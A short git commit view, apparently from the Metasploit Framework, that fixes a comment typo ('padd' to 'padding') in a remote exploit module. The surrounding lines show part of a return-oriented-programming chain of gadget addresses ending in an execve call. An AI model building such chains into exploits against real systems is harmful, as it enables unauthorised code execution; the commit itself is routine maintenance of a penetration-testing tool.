msftidy clean up

bug/bundler_fix
m0t 2017-04-12 16:25:21 +01:00
parent 374d7809b5
commit 5e42dde6b6
1 changed files with 6 additions and 6 deletions

View File

@ -152,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
0x40c1a0, # pop rax, ret
0, # envp @rax
0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
0xcacc013, # padd
0xcacc013, # padding
0x408a98, # execve,
0
].pack("Q*")